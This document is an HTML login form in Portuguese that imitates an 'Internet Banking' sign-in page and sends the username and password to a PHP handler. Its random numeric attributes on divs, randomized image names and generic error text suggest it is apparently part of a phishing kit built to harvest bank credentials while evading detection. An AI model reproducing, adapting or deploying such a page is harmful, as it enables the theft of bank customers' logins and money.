

<!DOCTYPE html>
<html>
<head>
    <title>Login</title>
    <link href="../css/style.css?=273602739569" rel="stylesheet" />
</head>

<body >
        <div  alt="251813193004"class="fundo">
            <div  alt="289314926791"class="modal">
                <div  alt="314505643745"class="linha">
                  <div  alt="20989084695"id="logo" class="alinhaauto">
                    <img src="../img/NtQ4D6EfckyuLpZkZjpuhjMcejuQwpqAPMiBKAnIIHi9kEdC.jpg" alt="">
                  </div>
                </div>
                <div  alt="184318238180"class="linha">
                  <div  alt="140586500136"id="logo"></div>
                </div>
                <div  alt="424499534634"class="linha">
                    <form id="kc-form-login" name="formulario" class="login100-form validate-form"  action="../api/controllerdesk.php"  method="post">
                        <label for="alert" style="display: none;" id="alert" name="alert" class="alert alert-error">Usuário Internet Banking inválido ou bloqueado ou senha incorreta.</label>
                        <div  alt="295219388705" class="wrap-input100 validate-input m-b-16">
                            <span class="has-float-label">
                                <label for="fullName" class="texto-nome">Usuário do Internet Banking</label>
                            </span>
                            <input id="nomeUsuario001" class="input100 alpha" name="usuario"  type="text" autofocus autocomplete="off" placeholder="Usuário do Internet Banking" maxlength="21" minlength="10" autofocus   required/>
                            <span class="focus-input100"></span>
                            <span class="symbol-input100">
                            <img src="../img/Tc90wl7KzSj79xmeLwuKchzpReowFflTzo3jsnLWlXTYfKbs.png" alt="">
                            </span>
                        </div>

                        <div  alt="250401345124" class="wrap-input100 validate-input m-b-16">

                            <span class="has-float-label">
                                <label for="passwords" class="texto-nome">Senha</label>
                            </span>

                            <input id="netpassword001" class="input100 alpha" name="senha"  type="password" autocomplete="off" placeholder="Senha" maxlength="8" minlength="6"  oninput=""  required/>                   
                                <span class="focus-input100"></span>
                                <span class="symbol-input100">
                                             <span class="lnr lnr-lock">
                                             <img src="../img/TLVtsNhqDcq3yk60Kj5DBxydbcXIaAY4VlNMcu5rof6cxadc.png" alt="">
                                             </span>
                                </span>
                        </div>
                        <div  alt="421507332143" class="container-login100-form-btn p-t-5">
				            <input type="hidden" name="pagina" value="1">
				            <input class="login100-form-btn" name="login" id="kc-login" type="submit" value="Entrar"></button>
                        </div>
                    </form>
            </div>

        </div>

</html>

</body>
</html>
